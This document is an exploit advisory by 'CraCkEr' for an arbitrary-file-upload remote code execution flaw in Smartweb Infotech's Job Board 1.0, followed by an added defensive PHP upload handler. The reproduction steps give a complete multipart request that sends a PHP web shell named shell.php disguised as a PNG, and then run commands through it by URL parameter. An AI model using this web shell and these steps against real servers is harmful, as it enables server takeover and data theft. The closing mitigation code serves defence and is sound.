┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://demo.smartwebinfotech.site/job-board/                              │
│  Vendor   : Smartweb Infotech                                                          │
│  Software : Job Board 1.0 - Job Portal Management System                               │
│  Vuln Type: Arbitrary File Upload Leads to RCE                                         │
│  Impact   : Upload PHPshell and execute commands on the server                         │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│                                                                                        │
│  Allows an attacker to overwrite critical files by uploading a shell and to execute    │
│  commands on the server                                                                │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


## Steps to Reproduce:

1. Go to [My Profile] at this path (https://website/settings/account)
2. Upload any image and capture the request in Burp Suite
3. Replace image.png with upload.php in [filename] and add this simple PHP shell:

    POST /job-board/settings/account HTTP/2

    -----------------------------427088175318086545183087924022
    Content-Disposition: form-data; name="profile"; filename="shell.php"
    Content-Type: image/png

    <?php echo system($_GET['command']); ?>
    -----------------------------427088175318086545183087924022--

4. Send the Request
5. Go back to the path (https://website/settings/account)
6. Refresh the page
7. Copy the link of the image that failed to load
8. Paste the link of your uploaded PHP shell - path (https://website/storage/upload/profile/shell_1687559183.php?command=id)
9. RCE Executed!


[-] Done
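
Defensive counterpart to the steps above, as an added example that is not part of the original advisory or the vendor's code: a handler for the "profile" field that ignores the client-supplied filename and Content-Type, checks the content itself, and writes a re-encoded image under a server-chosen name. The function name, storage path, size cap and allowed types are assumptions, and the GD and fileinfo extensions are assumed to be loaded.

```php
<?php
// Added example (hypothetical names; not Job Board's own code).
declare(strict_types=1);

const MAX_BYTES = 2 * 1024 * 1024;                              // assumed size cap
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg'];  // detected MIME => extension we assign

function store_profile_image(array $file, string $storageDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // $file['name'] and $file['type'] are never used: both come from the client
    // (the request above sends filename="shell.php" with Content-Type: image/png).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('not an allowed image type');
    }
    // Decode with GD; a bare PHP script is not a decodable image and is rejected here.
    $data = file_get_contents($file['tmp_name']);
    $img  = $data === false ? false : @imagecreatefromstring($data);
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Server-generated name and extension; nothing from the request reaches the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storageDir, '/') . '/' . $name;
    // Re-encode so only pixel data is written; metadata or appended bytes are dropped.
    $ok = $ext === 'png' ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name;
}

// Usage inside the upload controller (storage path is an assumed placeholder):
// $name = store_profile_image($_FILES['profile'], '/var/app/uploads/profile');
```

As a second layer, the upload directory should sit outside the web root or have script execution disabled in the web server configuration, so that a file that does land there is served as static data.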